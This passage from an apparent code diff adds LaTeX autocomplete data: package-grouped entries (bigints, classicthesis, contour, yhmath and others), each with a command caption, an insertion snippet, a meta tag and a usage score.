'\\genfrac', + meta: 'bigints-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'bigints-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'bigints-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'bigints-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'bigints-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'bigints-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'bigints-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'bigints-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', 
+ snippet: '\\allowdisplaybreaks', + meta: 'bigints-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'bigints-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'bigints-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'bigints-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'bigints-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'bigints-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'bigints-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'bigints-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'bigints-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'bigints-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'bigints-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'bigints-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'bigints-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'bigints-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'bigints-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'bigints-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'bigints-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'bigints-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'bigints-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'bigints-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'bigints-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'bigints-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'bigints-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'bigints-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'bigints-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'bigints-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'bigints-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: 
'\\uproot{$1}', + meta: 'bigints-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'bigints-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'bigints-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'bigints-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'bigints-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'bigints-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'bigints-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'bigints-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'bigints-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'bigints-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'bigints-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'bigints-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'bigints-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'bigints-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'bigints-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'bigints-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'bigints-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'bigints-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'bigints-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'bigints-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'bigints-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'bigints-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'bigints-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'bigints-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'bigints-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'bigints-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'bigints-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'bigints-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'bigints-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'bigints-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: 
'\\exp', + meta: 'bigints-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'bigints-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'bigints-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'bigints-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'bigints-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'bigints-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'bigints-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'bigints-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'bigints-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'bigints-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'bigints-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'bigints-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'bigints-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'bigints-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'bigints-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'bigints-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'bigints-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'bigints-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'bigints-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'bigints-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'bigints-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'bigints-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'bigints-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'bigints-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'bigints-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'bigints-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'bigints-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'bigints-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'bigints-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'bigints-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'bigints-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'bigints-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'bigints-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 
'bigints-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'bigints-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'bigints-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'bigints-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'bigints-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'bigints-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'bigints-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'bigints-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'bigints-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'bigints-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'bigints-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'bigints-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'bigints-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'bigints-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'bigints-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bigints-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'bigints-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'bigints-cmd', + score: 0.0063276692758974925, + }, + ], + classicthesis: [ + { + caption: '\\marginpar{}', + snippet: '\\marginpar{$1}', + meta: 'classicthesis-cmd', + score: 0.003400158497921723, + }, + { + caption: '\\marginpar', + snippet: '\\marginpar', + meta: 'classicthesis-cmd', + score: 0.003400158497921723, + }, + { + caption: '\\cftsecleader', + snippet: '\\cftsecleader', + meta: 'classicthesis-cmd', + score: 0.0011340882025681251, + }, + { + caption: '\\cftsubsecleader', + snippet: '\\cftsubsecleader', + meta: 'classicthesis-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\spacedlowsmallcaps{}', + snippet: '\\spacedlowsmallcaps{$1}', + meta: 'classicthesis-cmd', + score: 0.002677188251799468, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'classicthesis-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'classicthesis-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'classicthesis-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\part{}', + snippet: '\\part{$1}', + meta: 'classicthesis-cmd', + score: 0.022180129487444723, + }, + { + caption: '\\tocEntry{}', + snippet: '\\tocEntry{$1}', + meta: 'classicthesis-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\graffito{}', + snippet: '\\graffito{$1}', + meta: 'classicthesis-cmd', + score: 1.1006799670632527e-5, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'classicthesis-cmd', + score: 0.422097569591803, + }, + { + caption: 
'\\spacedallcaps{}', + snippet: '\\spacedallcaps{$1}', + meta: 'classicthesis-cmd', + score: 0.0015281000475958944, + }, + { + caption: '\\cftchapleader', + snippet: '\\cftchapleader', + meta: 'classicthesis-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\myVersion', + snippet: '\\myVersion', + meta: 'classicthesis-cmd', + score: 0.00018029288638573757, + }, + { + caption: '\\ctparttext{}', + snippet: '\\ctparttext{$1}', + meta: 'classicthesis-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'classicthesis-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'classicthesis-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'classicthesis-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'classicthesis-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'classicthesis-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'classicthesis-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'classicthesis-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'classicthesis-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'classicthesis-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'classicthesis-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\titleclass{}{}[]', + snippet: '\\titleclass{$1}{$2}[$3]', + meta: 'classicthesis-cmd', + score: 0.00028979763314974667, + }, + { + caption: '\\titlelabel{}', + snippet: '\\titlelabel{$1}', + meta: 'classicthesis-cmd', + score: 6.40387839367932e-6, + }, + { + caption: '\\thetitle', + snippet: '\\thetitle', + meta: 'classicthesis-cmd', + score: 0.0015531478302713473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'classicthesis-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'classicthesis-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\titleformat{}{}{}{}{}[]', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}[$6]', + meta: 'classicthesis-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}[]{}{}{}{}', + snippet: '\\titleformat{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'classicthesis-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}', + snippet: '\\titleformat{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}{}{}{}', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}', + meta: 'classicthesis-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titlespacing{}{}{}{}', + snippet: '\\titlespacing{$1}{$2}{$3}{$4}', + meta: 'classicthesis-cmd', + score: 0.023062744385192156, + }, + { + caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'classicthesis-cmd', + score: 0.038323601301945065, + }, + { + caption: 
'\\markright{}', + snippet: '\\markright{$1}', + meta: 'classicthesis-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\markright{}{}', + snippet: '\\markright{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\filleft', + snippet: '\\filleft', + meta: 'classicthesis-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\filcenter', + snippet: '\\filcenter', + meta: 'classicthesis-cmd', + score: 0.0004835660211260246, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'classicthesis-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'classicthesis-cmd', + score: 0.044016804142963585, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'classicthesis-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\chaptertitlename', + snippet: '\\chaptertitlename', + meta: 'classicthesis-cmd', + score: 0.0016985007766926272, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'classicthesis-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\filright', + snippet: '\\filright', + meta: 'classicthesis-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\titlerule', + snippet: '\\titlerule', + meta: 'classicthesis-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\titlerule[]{}', + snippet: '\\titlerule[$1]{$2}', + meta: 'classicthesis-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'classicthesis-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'classicthesis-cmd', + score: 2.341195220791228, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'classicthesis-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'classicthesis-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'classicthesis-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'classicthesis-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'classicthesis-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'classicthesis-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'classicthesis-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'classicthesis-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\lsstyle', + snippet: '\\lsstyle', + meta: 'classicthesis-cmd', + score: 0.0023367519914345774, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'classicthesis-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\DisableLigatures[]{}', + snippet: '\\DisableLigatures[$1]{$2}', + meta: 'classicthesis-cmd', + score: 0.0009805246614299932, + }, + { + caption: 
'\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'classicthesis-cmd', + score: 0.00021116765384691477, + }, + ], + expl3: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'expl3-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'expl3-cmd', + score: 0.2864294797053033, + }, + ], + 'pst-plot': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-plot-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-plot-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-plot-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-plot-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-plot-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-plot-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-plot-cmd', + score: 0.006520475264573554, + }, + ], + chemarrow: [ + { + caption: '\\chemarrow', + snippet: '\\chemarrow', + meta: 'chemarrow-cmd', + score: 0.0005176077206367611, + }, + ], + prettyref: [ + { + caption: '\\newrefformat{}{}', + snippet: '\\newrefformat{$1}{$2}', + meta: 'prettyref-cmd', + score: 0.001373625900102228, + }, + { + caption: '\\prettyref{}', + snippet: '\\prettyref{$1}', + meta: 'prettyref-cmd', + score: 0.005783541047730358, + }, + ], + versions: [ + { + caption: '\\includeversion{}', + snippet: '\\includeversion{$1}', + meta: 'versions-cmd', + score: 0.0028410409433993543, + }, + { + caption: '\\excludeversion{}', + snippet: '\\excludeversion{$1}', + meta: 'versions-cmd', + score: 0.001742562336270228, + }, + { + caption: '\\processifversion{}{}', + snippet: '\\processifversion{$1}{$2}', + meta: 'versions-cmd', + score: 0.0022991412707353805, + }, + ], + contour: [ + { + caption: '\\contour{}{}', + snippet: '\\contour{$1}{$2}', + meta: 'contour-cmd', + score: 0.0008245159401597211, + }, + { + caption: '\\contourlength{}', + snippet: '\\contourlength{$1}', + meta: 'contour-cmd', + score: 8.130187059343861e-5, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'contour-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'contour-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'contour-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'contour-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'contour-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'contour-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'contour-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'contour-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'contour-cmd', + score: 0.008565354665444157, + }, + ], + xintexpr: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xintexpr-cmd', + score: 0.021170869458413965, + }, + { + 
caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xintexpr-cmd', + score: 0.021170869458413965, + }, + ], + tocstyle: [ + { + caption: '\\usetocstyle{}', + snippet: '\\usetocstyle{$1}', + meta: 'tocstyle-cmd', + score: 3.2405622997778076e-6, + }, + ], + bigdelim: [ + { + caption: '\\multirow{}{}{}', + snippet: '\\multirow{$1}{$2}{$3}', + meta: 'bigdelim-cmd', + score: 0.07525389638751734, + }, + { + caption: '\\multirow{}[]{}{}', + snippet: '\\multirow{$1}[$2]{$3}{$4}', + meta: 'bigdelim-cmd', + score: 0.07525389638751734, + }, + ], + eulervm: [ + { + caption: '\\big', + snippet: '\\big', + meta: 'eulervm-cmd', + score: 0.05613164277964739, + }, + ], + xr: [ + { + caption: '\\externaldocument{}', + snippet: '\\externaldocument{$1}', + meta: 'xr-cmd', + score: 0.0008648763879096798, + }, + ], + yhmath: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'yhmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'yhmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'yhmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'yhmath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'yhmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'yhmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'yhmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'yhmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'yhmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'yhmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'yhmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'yhmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { 